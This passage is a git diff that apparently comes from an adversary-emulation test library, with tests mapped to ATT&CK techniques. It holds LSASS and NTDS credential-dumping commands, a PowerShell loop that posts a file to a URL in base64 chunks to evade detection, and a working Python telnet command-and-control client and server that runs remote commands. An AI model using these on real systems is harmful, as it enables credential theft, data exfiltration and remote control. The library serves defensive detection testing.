+      Computer must have venv configured at #{venv_path}
     prereq_command: |
-      py -3 -m pip --version >nul 2>&1
-      exit /b %errorlevel%
+      if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
     get_prereq_command: |
-      echo "PIP must be installed manually"
+      py -m venv "#{venv_path}"
   - description: |
-      pypykatz must be installed and part of PATH
+      pypykatz must be installed 
     prereq_command: |
-      pypykatz -h >nul 2>&1
-      exit /b %errorlevel%
+      if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
-      pip install pypykatz
+      & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
   executor:
     command: |
-      pypykatz live registry
+      "#{venv_path}\Scripts\pypykatz" live lsa 
     name: command_prompt
     elevation_required: true
 - name: esentutl.exe SAM copy
diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md
index 3c27055a..62ad42f0 100644
--- a/atomics/T1003.003/T1003.003.md
+++ b/atomics/T1003.003/T1003.003.md
@@ -30,6 +30,8 @@ The following tools and techniques can be used to enumerate the NTDS file and th
 
 - [Atomic Test #8 - Create Symlink to Volume Shadow Copy](#atomic-test-8---create-symlink-to-volume-shadow-copy)
 
+- [Atomic Test #9 - Create Volume Shadow Copy with diskshadow](#atomic-test-9---create-volume-shadow-copy-with-diskshadow)
+
 
 <br/>
 
@@ -425,4 +427,39 @@ mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - Create Volume Shadow Copy with diskshadow
+This test is intended to be run on a domain controller
+An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b385996c-0e7d-4e27-95a4-aca046b119a7
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| filename | Location of the script | Path | PathToAtomicsFolder&#92;T1003.003&#92;src&#92;diskshadow.txt|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+mkdir c:\exfil
+diskshadow.exe /s #{filename}
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml
index 02bb903f..50f69f6b 100644
--- a/atomics/T1003.003/T1003.003.yaml
+++ b/atomics/T1003.003/T1003.003.yaml
@@ -242,3 +242,22 @@ atomic_tests:
       mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
     name: command_prompt
     elevation_required: true
+
+- name: Create Volume Shadow Copy with diskshadow
+  auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7
+  description: |
+    This test is intended to be run on a domain controller
+    An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit
+  supported_platforms:
+  - windows
+  input_arguments: 
+    filename:
+      description: Location of the script
+      type: Path
+      default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt
+  executor:
+    command: |
+      mkdir c:\exfil
+      diskshadow.exe /s #{filename}
+    name: command_prompt
+    elevation_required: true
diff --git a/atomics/T1003.003/src/diskshadow.txt b/atomics/T1003.003/src/diskshadow.txt
new file mode 100644
index 00000000..9485115c
--- /dev/null
+++ b/atomics/T1003.003/src/diskshadow.txt
@@ -0,0 +1,5 @@
+set context persistent nowriters
+set metadata C:\exfil\metadata.cab
+add volume c: alias loot
+create
+expose %loot% s:
\ No newline at end of file
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index d7205e58..5762e03e 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -351,13 +351,14 @@ Successful execution of this test will list dns zones in the terminal.
 | user_name | username including domain. | string | domain&#92;user|
 | acct_pass | Account password. | string | password|
 | host_name | hostname or ip address to connect to. | string | 192.168.1.1|
+| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;venv_t1018|
 
 
 #### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
 
 
 ```cmd
-adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 ```
 
 
@@ -367,7 +368,7 @@ adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
 ##### Description: Computer must have python 3 installed
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1}
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -375,27 +376,23 @@ New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction
 invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
 Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
 ```
-##### Description: Computer must have pip installed
+##### Description: Computer must have venv configured at #{venv_path}
 ##### Check Prereq Commands:
 ```powershell
-if (pip3 -V) {exit 0} else {exit 1}
+if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
-New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+py -m venv "#{venv_path}"
 ```
-##### Description: adidnsdump must be installed and part of PATH
+##### Description: adidnsdump must be installed
 ##### Check Prereq Commands:
 ```powershell
-if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
-pip3 install adidnsdump
+& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
 ```
 
 
diff --git a/atomics/T1018/T1018.yaml b/atomics/T1018/T1018.yaml
index dc09fa60..b7786b29 100644
--- a/atomics/T1018/T1018.yaml
+++ b/atomics/T1018/T1018.yaml
@@ -166,35 +166,35 @@ atomic_tests:
       description: hostname or ip address to connect to.
       type: string
       default: "192.168.1.1"
+    venv_path:
+      description: Path to the folder for the tactics venv
+      type: string
+      default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018
   dependency_executor_name: powershell
   dependencies:
   - description: |
       Computer must have python 3 installed
     prereq_command: |
-      if (python --version) {exit 0} else {exit 1}
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
       invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
       Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
   - description: |
-      Computer must have pip installed
+      Computer must have venv configured at #{venv_path}
     prereq_command: |
-      if (pip3 -V) {exit 0} else {exit 1}
+      if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit 1 }
     get_prereq_command: |
-      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-      invoke-webrequest "https://bootstrap.pypa.io/ez_setup.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"      
-      invoke-webrequest "https://bootstrap.pypa.io/get-pip.py" -outfile "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\ez_setup.py"
-      cmd /c "PathToAtomicsFolder\..\ExternalPayloads\get-pip.py"
+      py -m venv "#{venv_path}"
   - description: |
-      adidnsdump must be installed and part of PATH
+      adidnsdump must be installed
     prereq_command: |
-      if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+      if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
-      pip3 install adidnsdump
+      & "#{venv_path}\Scripts\pip.exe" install --no-cache-dir adidnsdump 2>&1 | Out-Null
   executor:
     command: |
-      adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+      "#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
     name: command_prompt
     elevation_required: true
 - name: Adfind - Enumerate Active Directory Computer Objects
diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md
index 70806f07..17d8d1b8 100644
--- a/atomics/T1030/T1030.md
+++ b/atomics/T1030/T1030.md
@@ -6,6 +6,8 @@
 
 - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits)
 
+- [Atomic Test #2 - Network-Based Data Transfer in Small Chunks](#atomic-test-2---network-based-data-transfer-in-small-chunks)
+
 
 <br/>
 
@@ -57,4 +59,47 @@ if [ ! -d #{folder_path} ]; then mkdir -p #{folder_path}; touch #{folder_path}/s
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Network-Based Data Transfer in Small Chunks
+Simulate transferring data over a network in small chunks to evade detection.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f0287b58-f4bc-40f6-87eb-692e126e7f8f
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| source_file_path | Path to the source file to transfer. | path | [User specified]|
+| destination_url | URL of the destination server. | url | http://example.com|
+| chunk_size | Size of each data chunk (in KB). | integer | 1024|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$file = [System.IO.File]::OpenRead(#{source_file_path})
+$chunkSize = #{chunk_size} * 1KB
+$buffer = New-Object Byte[] $chunkSize
+
+while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+    $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+    Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+}
+$file.Close()
+```
+
+
+
+
+
+
 <br/>
diff --git a/atomics/T1030/T1030.yaml b/atomics/T1030/T1030.yaml
index 1497fb07..02989e8d 100644
--- a/atomics/T1030/T1030.yaml
+++ b/atomics/T1030/T1030.yaml
@@ -31,3 +31,35 @@ atomic_tests:
     cleanup_command: |
       if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi;
     name: sh
+
+- name: Network-Based Data Transfer in Small Chunks
+  auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
+  description: "Simulate transferring data over a network in small chunks to evade detection."
+  supported_platforms:
+  - "windows"
+  input_arguments:
+    source_file_path:
+      description: "Path to the source file to transfer."
+      type: path
+      default: "[User specified]"
+    destination_url:
+      description: "URL of the destination server."
+      type: url
+      default: "http://example.com"
+    chunk_size:
+      description: "Size of each data chunk (in KB)."
+      type: integer
+      default: 1024
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $file = [System.IO.File]::OpenRead(#{source_file_path})
+      $chunkSize = #{chunk_size} * 1KB
+      $buffer = New-Object Byte[] $chunkSize
+  
+      while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+          $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+          Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+      }
+      $file.Close()
diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md
index 2cb24d7c..98193853 100644
--- a/atomics/T1046/T1046.md
+++ b/atomics/T1046/T1046.md
@@ -215,7 +215,7 @@ python "#{filename}" -i #{host_ip}
 ##### Description: Check if python exists on the machine
 ##### Check Prereq Commands:
 ```powershell
-if (python --version) {exit 0} else {exit 1}
+if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1046/T1046.yaml b/atomics/T1046/T1046.yaml
index f3e32093..6633b73f 100644
--- a/atomics/T1046/T1046.yaml
+++ b/atomics/T1046/T1046.yaml
@@ -115,7 +115,7 @@ atomic_tests:
   - description: |
       Check if python exists on the machine
     prereq_command: |
-      if (python --version) {exit 0} else {exit 1}
+      if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
     get_prereq_command: |
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
       invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md
index 49ab1de2..b3782da6 100644
--- a/atomics/T1059.006/T1059.006.md
+++ b/atomics/T1059.006/T1059.006.md
@@ -48,7 +48,8 @@ $which_python -c 'import requests;import os;url = "#{script_url}";malicious_comm
 
 #### Cleanup Commands:
 ```sh
-rm #{payload_file_name}
+rm #{payload_file_name} 
+pip-autoremove pypykatz >nul 2> nul
 ```
 
 
diff --git a/atomics/T1059.006/T1059.006.yaml b/atomics/T1059.006/T1059.006.yaml
index 14b8c5c9..cf447b8d 100644
--- a/atomics/T1059.006/T1059.006.yaml
+++ b/atomics/T1059.006/T1059.006.yaml
@@ -38,6 +38,7 @@ atomic_tests:
       name: sh
       cleanup_command: |
         rm #{payload_file_name} 
+        pip-autoremove pypykatz >nul 2> nul
   - name: 'Execute Python via scripts'
     auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
     description: Create Python file (.py) that downloads and executes shell script via executor arguments
diff --git a/atomics/T1059/T1059.md b/atomics/T1059/T1059.md
new file mode 100644
index 00000000..d0866c94
--- /dev/null
+++ b/atomics/T1059/T1059.md
@@ -0,0 +1,67 @@
+# T1059 - Command and Scripting Interpreter
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059)
+<blockquote>Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+
+There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).
+
+Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - AutoIt Script Execution](#atomic-test-1---autoit-script-execution)
+
+
+<br/>
+
+## Atomic Test #1 - AutoIt Script Execution
+An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** a9b93f17-31cb-435d-a462-5e838a2a6026
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| script_path | AutoIt Script Path | path | PathToAtomicsFolder&#92;T1059&#92;src&#92;calc.au3|
+| autoit_path | AutoIt Executable File Path | path | C:&#92;Program Files (x86)&#92;AutoIt3&#92;AutoIt3.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AutoIt executable file must exist on disk at the specified location (#{autoit_path})
+##### Check Prereq Commands:
+```powershell
+if(Test-Path "#{autoit_path}") {
+    exit 0
+} else {
+    exit 1
+}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+$AutoItURL = "https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe"
+$InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads\autoit-v3-setup.exe"
+Invoke-WebRequest -Uri $AutoItURL -OutFile $InstallerPath
+Start-Process -FilePath $InstallerPath -ArgumentList "/S" -Wait
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1059/T1059.yaml b/atomics/T1059/T1059.yaml
new file mode 100644
index 00000000..ec338e81
--- /dev/null
+++ b/atomics/T1059/T1059.yaml
@@ -0,0 +1,38 @@
+attack_technique: T1059
+display_name: 'Command and Scripting Interpreter'
+atomic_tests:
+- name: AutoIt Script Execution
+  auto_generated_guid: a9b93f17-31cb-435d-a462-5e838a2a6026
+  description: |
+    An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      AutoIt executable file must exist on disk at the specified location (#{autoit_path})
+    prereq_command: |
+      if(Test-Path "#{autoit_path}") {
+          exit 0
+      } else {
+          exit 1
+      }
+    get_prereq_command: |
+      New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+      $AutoItURL = "https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe"
+      $InstallerPath = "$PathToAtomicsFolder\..\ExternalPayloads\autoit-v3-setup.exe"
+      Invoke-WebRequest -Uri $AutoItURL -OutFile $InstallerPath
+      Start-Process -FilePath $InstallerPath -ArgumentList "/S" -Wait
+  input_arguments:
+    script_path:
+      description: AutoIt Script Path
+      type: path
+      default: PathToAtomicsFolder\T1059\src\calc.au3
+    autoit_path:
+      description: AutoIt Executable File Path
+      type: path
+      default: C:\Program Files (x86)\AutoIt3\AutoIt3.exe
+  executor:
+    command: |
+      Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
+    name: powershell
diff --git a/atomics/T1059/src/calc.au3 b/atomics/T1059/src/calc.au3
new file mode 100644
index 00000000..d2d984c6
--- /dev/null
+++ b/atomics/T1059/src/calc.au3
@@ -0,0 +1,34 @@
+; This script demonstrates obfuscation techniques and suspicious behaviors
+
+; Hide the AutoIt window
+#NoTrayIcon
+
+; Delay execution to avoid detection
+Sleep(2000)
+
+; Randomize variable names and function calls to evade static analysis
+Local $s = "calc"
+Local $x = "o"
+Local $y = "i"
+Local $z = "e"
+Local $t = "r"
+Local $a = "c"
+Local $b = "t"
+Local $c = "x"
+Local $d = "e"
+Local $e = "u"
+Local $f = "a"
+Local $g = "s"
+
+; Create variables to store command strings
+Local $command1 = $s & $x & $y & $z & $t & $a & $b & $c & $d & $e & $f & $g
+Local $command2 = $s & $t & $y & $a & $c & $t
+
+; Mimic the launch of a potentially malicious process
+Run("powershell -Command ""Start-Process -FilePath 'calc.exe' -WindowStyle Hidden""", "", @SW_HIDE)
+
+; Generate random delays between commands to avoid pattern detection
+Sleep(Random(1000, 3000))
+
+; Exit the script to avoid further detection
+Exit
diff --git a/atomics/T1071.001/T1071.001.md b/atomics/T1071.001/T1071.001.md
index 0782d04c..b527d24e 100644
--- a/atomics/T1071.001/T1071.001.md
+++ b/atomics/T1071.001/T1071.001.md
@@ -98,9 +98,9 @@ if (Test-Path #{curl_path}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
+Invoke-WebRequest "https://curl.se/windows/dl-8.6.0_2/curl-8.6.0_2-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
 Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
-Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.71.1-win32-mingw\bin\curl.exe" #{curl_path}
+Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-8.6.0_2-win32-mingw\bin\curl.exe" #{curl_path}
 Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
 Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
 ```
diff --git a/atomics/T1071.001/T1071.001.yaml b/atomics/T1071.001/T1071.001.yaml
index 18b231a1..b6948b2f 100644
--- a/atomics/T1071.001/T1071.001.yaml
+++ b/atomics/T1071.001/T1071.001.yaml
@@ -48,9 +48,9 @@ atomic_tests:
       if (Test-Path #{curl_path}) {exit 0} else {exit 1}
     get_prereq_command: |
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-      Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
+      Invoke-WebRequest "https://curl.se/windows/dl-8.6.0_2/curl-8.6.0_2-win32-mingw.zip" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
       Expand-Archive -Path "PathToAtomicsFolder\..\ExternalPayloads\curl.zip" -DestinationPath "PathToAtomicsFolder\..\ExternalPayloads\curl"
-      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-7.71.1-win32-mingw\bin\curl.exe" #{curl_path}
+      Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\curl\curl-8.6.0_2-win32-mingw\bin\curl.exe" #{curl_path}
       Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl"
       Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\curl.zip"
   executor:
diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
new file mode 100644
index 00000000..db385f97
--- /dev/null
+++ b/atomics/T1071/T1071.md
@@ -0,0 +1,59 @@
+# T1071 - Application Layer Protocol
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1071)
+<blockquote>Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
+
+Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Telnet C2](#atomic-test-1---telnet-c2)
+
+
+<br/>
+
+## Atomic Test #1 - Telnet C2
+An adversary may establish telnet communication from compromised endpoint to command and control (C2) server to be able to operate more attack on objectives.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3b0df731-030c-4768-b492-2a3216d90e53
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| server_ip | C2 server IP or URL | url | 127.0.0.1|
+| client_path | Client agent path | url | PathToAtomicsFolder&#92;T1071&#92;bin&#92;telnet_client.exe|
+| server_port | C2 server port | Integer | 23|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+#{client_path} #{server_ip} --port #{server_port}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Command and Control (C2) server cam be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with specified IP that must be reachable by client (telnet_client.exe)
+##### Check Prereq Commands:
+```powershell
+$connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
+if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "Setup C2 server manually"
+```
+
+
+
+
+<br/>
diff --git a/atomics/T1071/T1071.yaml b/atomics/T1071/T1071.yaml
new file mode 100644
index 00000000..995d672c
--- /dev/null
+++ b/atomics/T1071/T1071.yaml
@@ -0,0 +1,35 @@
+attack_technique: T1071
+display_name: 'Application Layer Protocol'
+atomic_tests:
+- name: Telnet C2
+  auto_generated_guid: 3b0df731-030c-4768-b492-2a3216d90e53
+  description: |
+    An adversary may establish telnet communication from compromised endpoint to command and control (C2) server to be able to operate more attack on objectives.
+  supported_platforms:
+  - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Command and Control (C2) server cam be established by running PathToAtomicsFolder\T1071\bin\telnet_server.exe on specified server with specified IP that must be reachable by client (telnet_client.exe)
+    prereq_command: |
+      $connection = Test-NetConnection -ComputerName #{server_ip} -Port #{server_port}
+      if ($connection.TcpTestSucceeded) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Write-Host "Setup C2 server manually"
+  input_arguments:
+    server_ip:
+      description: C2 server IP or URL
+      type: url
+      default: 127.0.0.1  # Replace "example.com" with the actual IP or URL
+    client_path:
+      description: Client agent path
+      type: url
+      default: PathToAtomicsFolder\T1071\bin\telnet_client.exe  # Update the path if needed
+    server_port:
+      description: C2 server port
+      type: Integer
+      default: 23
+  executor:
+    command: |
+      #{client_path} #{server_ip} --port #{server_port}
+    name: powershell
diff --git a/atomics/T1071/bin/telnet_client.exe b/atomics/T1071/bin/telnet_client.exe
new file mode 100644
index 00000000..de6d3f35
Binary files /dev/null and b/atomics/T1071/bin/telnet_client.exe differ
diff --git a/atomics/T1071/bin/telnet_server.exe b/atomics/T1071/bin/telnet_server.exe
new file mode 100644
index 00000000..b1fe9bd9
Binary files /dev/null and b/atomics/T1071/bin/telnet_server.exe differ
diff --git a/atomics/T1071/src/client.py b/atomics/T1071/src/client.py
new file mode 100644
index 00000000..d0ce7d03
--- /dev/null
+++ b/atomics/T1071/src/client.py
@@ -0,0 +1,44 @@
+import argparse
+import asyncio
+import telnetlib3
+
+async def shell(reader, writer):
+    while True:
+        # Read command from the server
+        command = await reader.read(1024)
+        if not command:
+            # End of File
+            break
+
+        # Execute the command using asyncio.create_subprocess_shell
+        process = await asyncio.create_subprocess_shell(command,
+                                                        stdout=asyncio.subprocess.PIPE,
+                                                        stderr=asyncio.subprocess.PIPE)
+        output, error = await process.communicate()
+        print(f"Receive command: {command}")
+
+        # Check if output is empty
+        if not output:
+            result = b"ok"
+        else:
+            result = output
+
+        # Send the result back to the server
+        writer.write(result.decode())
+
+        # Flush the writer to ensure data is sent immediately
+        await writer.drain()
+
+def main(server_ip, port):
+    loop = asyncio.get_event_loop()
+    coro = telnetlib3.open_connection(server_ip, port, shell=shell)
+    reader, writer = loop.run_until_complete(coro)
+    loop.run_until_complete(writer.protocol.waiter_closed)
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Telnet client")
+    parser.add_argument("server_ip", help="IP address of the server")
+    parser.add_argument("--port", type=int, default=23, help="Port number (default: 23)")
+    args = parser.parse_args()
+
+    main(args.server_ip, args.port)
diff --git a/atomics/T1071/src/server.py b/atomics/T1071/src/server.py
new file mode 100644
index 00000000..24259c57
--- /dev/null
+++ b/atomics/T1071/src/server.py
@@ -0,0 +1,92 @@
+import argparse
+import socket
+
+def main(host, port):
+    # Create a socket object
+    server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+    # Bind the socket to the host and port
+    server_socket.bind((host, port))
+
+    # Listen for incoming connections
+    server_socket.listen(1)
+
+    print('Server listening on {}:{}'.format(host, port))
+
+    while True:
+        try:
+            # Accept incoming connections
+            client_socket, client_address = server_socket.accept()
+            print('Connection established with {}:{}'.format(client_address[0], client_address[1]))
+
+            # Send Telnet negotiation
+            client_socket.sendall(b"\xFF\xFB\x01")  # Telnet WILL option 01 (echo)
+            client_socket.sendall(b"\xFF\xFD\x03")  # Telnet DO option 03 (suppress go ahead)
+
+            # Send a blank string immediately after the client connects
+            client_socket.sendall(b"")
+
+            command = ""
+            client_socket.sendall(command.encode())
+
+            # Receive output from the client
+            output = client_socket.recv(65536)
+                
+            # Print output (decode if it's command data)
+            try:
+                print("Output from client:", output.decode())
+            except UnicodeDecodeError:
+                print("Output from client:", output)
+
+            command = ""
+            client_socket.sendall(command.encode())
+
+            # Receive output from the client
+            output = client_socket.recv(65536)
+                
+            # Print output (decode if it's command data)
+            try:
+                print("Output from client:", output.decode())
+            except UnicodeDecodeError:
+                print("Output from client:", output)
+
+            while True:
+                while True:
+                    command = input("Enter command to execute on client: ")
+                    if command.strip():
+                        break
+                    else:
+                        print("Command cannot be empty. Please try again.")
+
+                # Send command to the client
+                client_socket.sendall(command.encode())
+
+                # Check for exit command
+                if command.lower() == "exit":
+                    break
+
